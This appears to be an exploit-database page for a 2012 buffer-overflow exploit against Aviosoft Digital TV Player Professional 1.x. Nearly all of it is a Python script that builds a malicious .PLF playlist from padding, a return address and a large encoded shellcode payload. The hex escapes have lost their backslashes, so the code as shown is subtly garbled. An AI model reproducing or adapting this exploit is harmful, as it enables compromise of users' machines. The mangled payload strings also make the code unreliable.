Aviosoft Digital TV Player Professional 1.x (Direct Retn)

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Aviosoft Digital TV Player Professional 1.x (Direct Retn)
# Published : 2012-11-26
# Author :
# Previous Title : Tunnelblick Local Root Exploit #2
# Next Title : CoolPlayer+ Portable 2.19.2 Buffer Overflow ASLR Bypass (Large Shellcode)

# Exploit Title: Aviosoft Digital TV Player Professional 1.x (Direct Retn)
# Date: 11-25-2012
# Exploit Author: Nezim (@nezimlufni)
# Vendor Homepage: http://www.aviosoft.com/
# Version: Aviosoft Digital TV Player Professional 1.x
# Tested on: Windows XP SP3
# Reference  : http://www.exploit-db.com/exploits/18096/
# Thanks to : modpr0be , @ardynetral  
# Website : http://is2c-dojo.com

filename="video.PLF"

junk = "http://"+"x90"*253
junk +="x33xBFx96x7C"
junk +="x90" * 32
junk +=("xdbxdcx2bxc9xb1x51xbbx01x5cx8ex27xd9x74x24xf4x58"
"x83xc0x04x31x58x13x03x59x4fx6cxd2xa5x05x9bx50xbd"
"x23xa4x94xc2xb4xd0x07x18x11x6cx92x5cxd2x0ex18xe4"
"xe5x01xa9x5bxfex56xf1x43xffx83x47x08xcbxd8x59xe0"
"x05x1fxc0x50xe1x5fx87xafx2bx95x65xaex69xc1x82x8b"
"x39x32x43x9ex24xb1xccx44xa6x2dx94x0fxa4xfaxd2x50"
"xa9xfdx0fx6dxfdx76x46x1dxd9x94x38x1ex10x7exdex2b"
"x10xb0x94x6bx9bx3bxdax77x0exb0x5bx8fx0exafxd5xc1"
"xa0xc3xbax22x6ax7dx68xbaxfbxb1xbcx2ax8bxc6xf2xf5"
"x27xd6x23x61x03xc5x38x4axc3xe9x17xf3x6axf0xfex8a"
"x80xf3xfcxd9x30x06xfex31xacxdfx09x44x80xb7xf6x70"
"x88x64x5ax2fx7cxc8x0fx8cxd1x31x7fx74xbexdcxdcx1e"
"x6dx56x3dx4bxf9xccxa4x03x3dx5bx26x35xabx74x89xec"
"xd3xa5x41xaax81x68x7bxe5x26xa2x28x5cx26x9bxa7xbb"
"x91x9ax71x14xddx75xd1xcex75x2fx2dx3exe6xa7x36xc7"
"xcfx41xeexc8x06xe4xefxe6xc1x6dx74x60x66x11x19xe5"
"x93xbfxb1xacx72x8cxbbxa9xefx48x35xd7xc1x90xb6xbd"
"xdcx53x14x3fx62x78xf5x32x19xb8x52xe7x75xd0xd6x09"
"x3ax37xe8x80x79xc7xc0x31xd5x65xbcx94x88xe3x3fx47"
"x7axa1x6ex98xacx21x3cxbfx48x7cx6dxc0x85xeax6dxc1"
"x1dx14x41xb6x35x16xe1x0cxddx19x30xdexe1x36xd5xa0"
"xc5x55x55x0fx09x4fx65x7f")
junk +="x90" * (261-len(junk))
junk +="CC" * (1000-len(junk))
exploitf = open(filename,"wb")
exploitf.write(junk)
exploitf.close()
print("Finish")
#Husnul Khatimah